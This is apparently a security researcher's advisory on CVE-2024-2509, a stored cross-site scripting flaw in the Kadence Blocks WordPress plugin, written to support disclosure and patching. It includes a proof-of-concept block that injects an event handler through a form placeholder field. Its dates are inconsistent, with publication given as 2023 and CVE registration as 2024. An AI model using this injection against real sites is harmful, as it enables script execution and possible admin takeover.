A critical vulnerability, CVE-2024-2509, has been uncovered in the popular Gutenberg Blocks by Kadence Blocks plugin, boasting over 400,000 active installations. This flaw opens the door to malicious attackers, allowing them to execute Stored XSS attacks and potentially create admin accounts, posing a significant threat to WordPress sites.
Main info:
CVE | CVE-2024-2509 |
Plugin | Gutenberg Blocks by Kadence Blocks < 3.2.26 |
Criticality | Very High |
All Time | 17 018 808 |
Active installations | 400 000+ |
Publicly Published | March 15, 2023 |
Last Updated | March 15, 2023 |
Researcher | Dmitrii Ignatyev |
OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
PoC | Yes |
Exploit | No |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2509 https://wpscan.com/vulnerability/dec4a632-e04b-4fdd-86e4-48304b892a4f/ |
Timeline
March 6, 2023 | Plugin testing and vulnerability detection in the Gutenberg Blocks by Kadence Blocks have been completed |
March 6, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
March 15, 2024 | Registered CVE-2024-2509 |
Discovery of the Vulnerability
During routine testing, security researchers identified a flaw within the Gutenberg Blocks by Kadence Blocks plugin that enables contributors to inject malicious code via stored XSS, ultimately leading to the unauthorized creation of admin accounts.
Understanding Stored XSS Attacks
Stored XSS vulnerabilities involve injecting malicious scripts into a web application, which are then stored and executed whenever the compromised page is accessed. In WordPress, this can occur through various entry points, such as form inputs, widgets, or post content.
Exploiting the Stored XSS Vulnerability
Exploiting CVE-2024-2509 involves crafting a post containing malicious content using the Gutenberg Blocks by Kadence Blocks plugin. By inserting carefully crafted code snippets, attackers can execute arbitrary scripts within the context of the site, potentially gaining administrative privileges.
POC:
<!-- wp:kadence/advanced-form -->\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"538_353543-f6\",\"colLayout\":\"equal\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"538_9c17ee-78\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column538_9c17ee-78\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/advanced-form-text {\"uniqueID\":\"9c5eb1-eb\",\"formID\":\"539\",\"label\":\"Name\",\"placeholder\":\"123\\u0022onmouseover='MALICIOUS_FUNCTION_HERE'\"} /--></div></div>\n<!-- /wp:kadence/column -->\n\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"538_b30f2d-7e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column538_b30f2d-7e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/advanced-form-email {\"uniqueID\":\"24e500-60\",\"formID\":\"539\",\"label\":\"Email\",\"required\":true} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<!-- wp:kadence/advanced-form-textarea {\"uniqueID\":\"3579ce-60\",\"formID\":\"539\",\"label\":\"Message\",\"required\":true} /-->\n\n<!-- wp:kadence/advanced-form-submit {\"uniqueID\":\"44ddad-75\",\"text\":\"Submit\"} /-->\n<!-- /wp:kadence/advanced-form -->
___
The presence of a Stored XSS vulnerability in a widely used plugin like Gutenberg Blocks poses significant risks. Attackers can leverage this vulnerability to execute various malicious activities, including spreading malware, defacing websites, or stealing sensitive data.
Recommendations for Improved Security
To mitigate the risk associated with CVE-2024-2509, users should promptly update the Gutenberg Blocks by Kadence Blocks plugin to the latest version, where the vulnerability has been patched. Additionally, website administrators should regularly monitor for security updates and conduct thorough security audits to identify and address any potential vulnerabilities in their WordPress ecosystem.
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-2509, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
DMITRII I.